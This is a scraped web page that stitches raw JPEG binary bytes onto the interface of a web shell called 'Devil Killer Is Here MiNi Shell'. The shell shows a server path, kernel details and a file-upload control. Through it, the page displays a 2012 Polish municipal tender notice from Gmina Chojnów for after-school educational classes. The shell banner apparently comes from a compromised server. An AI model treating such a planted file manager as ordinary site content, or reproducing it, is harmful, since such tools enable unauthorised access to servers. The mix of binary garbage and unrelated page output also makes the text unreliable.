JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120705/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120705/237478-N-2012.html

<p class="kh_header"><b>Chojnów: Wykonanie usługi edukacyjnej w ramach projektu pn.
 Indywidualizacja procesu nauczania w Gminie Chojnów</b><br>
<b>Numer ogłoszenia: 237478 - 2012; data zamieszczenia: 05.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chojnów , ul. Fabryczna 1, 59-225 Chojnów, woj. dolnośląskie, tel. 076 8188504, faks 076 8187587.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina-chojnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi edukacyjnej w ramach projektu pn.
 Indywidualizacja procesu nauczania w Gminie Chojnów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest wykonanie w roku szkolnym 20122013 usługi edukacyjnej w ramach projektu systemowego pn. Indywidualizacja procesu nauczania w Gminie Chojnów. Zamówienie składa się z 30 części, w tym: 
I.1   7 części- zajęcia dydaktyczno-wyrównawcze,
I.2   6 części - zajęcia rozwijające uzdolnienia, 
I.3   17 części - zajęcia specjalistyczne, w tym:
I.3.1   5 części - zajęcia logopedyczne dla dzieci z wadami wymowy, 
I.3.2   7 części - zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy, 
I.3.3   3 części - zajęcia socjoterapeutyczne, 
I.3.4   2 części - zajęcia korekcyjno - kompensacyjne.
2)   Przedmiot zamówienia obejmuje 30 części i szczegółowo został określony w opisie przedmiotu zamówienia stanowiącym  załącznik nr 6  do siwz. 
3)   Przedmiotem zamówienia jest wykonanie usługi edukacyjnej w ramach projektu pn.  Indywidualizacja procesu nauczania w Gminie Chojnów polegającej na prowadzeniu zajęć dodatkowych (pozalekcyjnych) dla uczniów uczących się w klasach I-III                  w sześciu szkołach podstawowych oraz jedna szkoła filialna w Gminie Chojnów                  w ramach projektu systemowego: Indywidualizacja procesu nauczania w Gminie Chojnów  współfinansowanego ze środków Unii Europejskiej w ramach POKL Priorytet IX, Działanie 9.1, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
4)   Zajęcia będą odbywać się w sześciu szkołach podstawowych z terenu gminy Chojnów tj.: 
4.1  Szkoła Podstawowa w Budziwojowie, Budziwojów 21, 59 - 225 Chojnów
4.2  Szkoła Podstawowa w Niedźwiedzicach filia w Goliszowie, Goliszów 35,          59 - 225 Chojnów 
4.3  Szkoła Podstawowa w Krzywej, Krzywa 52,  59 - 225 Chojnów
4.4  Szkoła Podstawowa w Niedźwiedzicach, Niedźwiedzice 16, 59 - 225 Chojnów
4.5  Szkoła Podstawowa w Okmianach, Okmiany 65,  59 - 225 Chojnów
4.6  Zespół Szkolno - Przedszkolny w Rokitkach, Rokitki 32a, 59 - 225 Chojnów
4.7  Szkoła Podstawowa w Starym Łomie, Stary Łom 42,  59 - 225 Chojnów.
5)   W ramach uzgodnień w zakresie tworzenia harmonogramu realizacji zadań  Wykonawca powinien przestrzegać następujących zasad: 
5.1  zajęcia odbywać się będą w dni robocze, z wyłączeniem sobót,
5.2  zajęcia nie powinny odbywać się wcześniej niż przed godziną 8:00 i później niż  po godzinie 16:00,
5.3  prowadzenie zajęć w godzinach wieczornych jest niedopuszczalne ze względu na stały dowóz dzieci ze szkół do domu,
5.4  ustalenie konkretnych godzin oraz dni rozpoczęcia zajęć w poszczególnych grupach powinno następować z uwzględnieniem planu lekcji uczniów wchodzących w skład danej grupy tak, aby nie pokrywały się one z godzinami lekcji w szkole,
5.5  realizacja zajęć rozliczana będzie godzinowo, przy czym pod pojęciem godzina zajęć rozwijających uzdolnienia i zajęć dydaktyczno - wyrównawczych należy rozumieć godzinę lekcyjną, a więc 45 minut, a godzina zajęć specjalistycznych 60 minut. 


6)	Łączna liczba grup i godzin przypadająca na jeden rodzaj zajęć dodatkowych                      w gminie Chojnów 
Rodzaj zajęć	Liczba grup	Liczba godzin
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji (zajęcia dydaktyczno - wyrównawcze)	7	270
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji (zajęcia korekcyjno - kompensacyjne)	2	100
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy (zajęcia specjalistyczne)	13	400
Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy	12	400
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej (zajęcia specjalistyczne)	5	220
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych (zajęcia dydaktyczno - wyrównawcze)	2	90
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych (zajęcia rozwijające uzdolnienia)	4	150
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych teatralnie (zajęcia rozwijające uzdolnienia)	1	35
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych językowo - język angielski (zajęcia rozwijające uzdolnienia)	2	90
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie (zajęcia rozwijające uzdolnienia)	2	60

 


7)     Szczegółowy zakres poszczególnych części, tj. liczba godzin oraz liczba grup, przedstawiony jest poniżej: 
7.1  Szkoła Podstawowa w Budziwojowie
Część 1.  Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu,   w  tym także zagrożonych ryzykiem dysleksji    (zajęcia dydaktyczno - wyrównawcze)
                I grupa (8 osób) - 30 h 
 Część 2.  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy (zajęcia specjalistyczne)
                I grupa (4 osoby) - 30 h;  II grupa (4 osoby) - 30 h;  III grupa (4 osoby)
                - 30 h;  IV grupa (4 osoby) - 30 h;   razem 120 h dla 4 grup (16 osób)
 Część 3.  Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy 
                 I grupa (14 osób) - 30h;  II grupa (14 osób) - 30h;  razem 60 h dla 2 grup    (28 osób)
               7.2  Szkoła Podstawowa w Niedźwiedzicach filia w Goliszowie
Część 4.  Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu,   w tym także zagrożonych ryzykiem dysleksji  (zajęcia dydaktyczno - wyrównawcze)
                I grupa (4 osoby) - 60 h; 
Część 5.  Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej  (zajęcia specjalistyczne)
                 I grupa (6 osób) - 90 h; 
Część 6. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy 
                I grupa (10 osób) - 60 h; 
               7.3  Szkoła Podstawowa w Krzywej
Część 7.  Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w  tym także zagrożonych ryzykiem dysleksji  (zajęcia dydaktyczno - wyrównawcze)
                I grupa (6 osób) - 30 h;  II grupa (6 osób) - 30 h;  razem 60 h dla 2 grup          (12 osób)
Część 8.  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy (zajęcia specjalistyczne)
                I grupa (4 osoby) - 30 h;  II grupa (4 osoby) - 30 h;  razem 60 h dla 2 grup (8 osób)


Część 9.  Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy 
                I grupa (7 osób) - 30 h;  II grupa (7 osób) - 30 h;  razem 60 h dla 2 grup         (14 osób)
Część 10. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych 
                 ze szczególnym uwzględnieniem nauk przyrodniczych  (zajęcia   
                 rozwijające uzdolnienia) 
                 I grupa (7 osób) - 30 h;  II grupa (7 osób) - 30 h;  razem 60 h dla 2 grup   
                 (14 osób)
              7.4  Szkoła Podstawowa w Niedźwiedzicach 
Część 11. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu,        w tym także zagrożonych ryzykiem dysleksji  (zajęcia korekcyjno - kompensacyjne)
                 I grupa (5 osób) - 40 h;  
Część 12. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności   matematycznych (zajęcia dydaktyczno - wyrównawcze)
                 I grupa (5 osób) - 30 h; 
Część 13. Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z  zaburzeniami komunikacji społecznej  (zajęcia specjalistyczne)
                 I grupa (10 osób) - 40 h; 
Część 14. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy 
                 I grupa (15 osób) - 40 h;
Część 15. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych 
ze szczególnym uwzględnieniem nauk przyrodniczych  (zajęcia rozwijające uzdolnienia)
                 I grupa (8 osób) - 30 h;
Część 16. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych 
                 teatralnie (zajęcia rozwijające uzdolnienia)
                 I grupa (8 osób) - 35 h;
              7.5  Szkoła Podstawowa w Okmianach 
Część 17.  Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji  (zajęcia dydaktyczno - wyrównawcze)
                   I grupa (6 osób) - 30 h; 
Część 18.  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy  (zajęcia  specjalistyczne)

                  I grupa (4 osoby) - 30 h;  II grupa (4 osoby) - 30 h;  III grupa (3 osoby) -       30 h;  razem 90 h dla 3 grup (11 osób)
Część 19. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy 
                 I grupa (9 osób) - 30 h;  II grupa (8 osób) - 30 h;  razem 60 h dla 2 grup   (17 osób)
              7.6  Zespół Szkolno - Przedszkolny w Rokitkach
Część 20. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu,    w tym także zagrożonych ryzykiem dysleksji  (zajęcia korekcyjno - kompensacyjne)
                 I grupa (5 osób) - 60 h; 
Część 21. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności  matematycznych  (zajęcia dydaktyczno - wyrównawcze)
                 I grupa (5 osób) - 60 h; 
Część 22. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy (zajęcia specjalistyczne)
                 I grupa (4 osób) - 40 h;
Część 23. Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej (zajęcia specjalistyczne)
                  I grupa (8 osób) - 30 h; II grupa (8 osób) - 30 h; III grupa (8 osób) - 30 h;       razem 90 h dla 3 grup (24 osoby)
Część 24. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy 
                 I grupa (12 osób) - 30 h;  II grupa (12 osób) - 30 h;  III grupa (12 osób) -  30 h;  razem 90 h dla 3 grup (36 osoby)
Część 25. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych   (zajęcia rozwijające uzdolnienia)
                  I grupa (8 osób) - 60 h;
Część 26. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych 
                 językowo - język angielski  (zajęcia rozwijające uzdolnienia)
                 I grupa (6 osób) - 45 h;  II grupa (6 osób) - 45 h;  razem 90 h dla 2 grup  (12  osób)
Część 27. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych 
                 plastycznie  (zajęcia rozwijające uzdolnienia)
                 I grupa (5 osób) - 30 h;  II grupa (5 osób) - 30 h;  razem 60 h dla 2 grup            (10 osób)
 
7.7  Szkoła Podstawowa w Starym Łomie
Część 28.  Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu,                w tym także zagrożonych ryzykiem dysleksji  (zajęcia dydaktyczno - wyrównawcze)
I grupa (7 osób) - 45 h;  II grupa (7 osób) - 45 h;  razem 90 h dla 2 grup  (14 osób)
Część 29. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy (zajęcia     specjalistyczne)
I grupa (4 osoby) - 30 h;  II grupa (4 osoby) - 30 h;  III grupa (4 osoby) -  30 h;  razem 90 h dla 3 grup (12 osób)
Część 30. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy 
                  I grupa (7 osób) - 30 h;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 30.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>uprawnień określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009r. Nr 50, poz. 400), i tak:
 -  zgodnie z § 4 ust.1 lub ust.2  rozporządzenia - dla części nr 1, 4, 7, 10, 12, 15,  16, 17, 21, 25, 27, 28,
 -  zgodnie z § 8  rozporządzenia - dla części nr 3, 6, 9, 14, 19, 24, 30,
 -  zgodnie z § 11ust. 2-4  rozporządzenia - dla części nr 26,
 -  zgodnie z § 19, § 20 ust. 2  rozporządzenia - dla części nr 5, 13, 23,
 -  zgodnie z § 21 ust. 2  rozporządzenia - dla części nr 2, 8, 18, 22, 29;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający żąda od Wykonawcy dysponowania co najmniej jedną osobą   
             posiadającą kwalifikacje do prowadzenia danego typu zajęć, zgodnie z   Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku              w sprawie szczegółowych kwalifikacji wymaganych  od nauczycieli oraz określenia szkół  i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli, w zakresie każdej z części;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)   Zaakceptowany wzór umowy  załącznik. nr 4 do siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy:
      1)   Zmiana umowy może być dokonana tylko za zgodą obu stron.
      2)   Wszystkie zmiany umowy dokonywane są w formie pisemnej i muszą być podpisane                            
             przez upoważnionych  przedstawicieli obu stron.
      3)   Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, dotyczących: 
                            a)   zmiana terminu realizacji zamówienia z przyczyn nieleżących po stronie                          Wykonawcy, w przypadku: 
                          - pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróconego terminu   zakończenia realizacji umowy,
  - wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy.
             b)  zmiana osób, które będą uczestniczyć w wykonaniu zamówienia w szczególności   przypadku choroby osoby, która będzie prowadziła zajęcia lub innych zdarzeń losowych uniemożliwiających prowadzenie zajęć. W przypadku zmiany osoby, prowadzącej zajęcia, nowa osoba, która będzie prowadzić zajęcia musi spełniać wymagania określone w pkt. 2.3.1 SIWZ. Zmiany te mogą zostać dokonane wyłącznie w przypadku Wykonawcy, który prowadzi działalność gospodarczą, pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany, przedłożenia dokumentów potwierdzających kwalifikacje osoby, która będzie prowadziła zajęcia oraz wyrażenia zgody Zamawiającego na tę zmianę. W przypadku osoby, która jest osobą fizyczną nie prowadzącą działalności gospodarczej na skutek zaistnienia okoliczności uniemożliwiających prowadzenie zajęć np. choroba umowa ulega rozwiązaniu, a w przypadku śmierci wygasa. 
      c)   w przypadku wystąpienia niezależnych od Zamawiającego, niemożliwych do  przewidzenia w trakcie zawierania umowy okoliczności takich jak np. klęski żywiołowe, znacząca absencja chorobowa dzieci, itp. Zamawiający ma prawo do zmniejszenia zakresu realizacji przedmiotu umowy do aktualnie niezbędnych swoich potrzeb lub zawieszenia świadczenia usług, na okres, w którym okoliczności występują. 
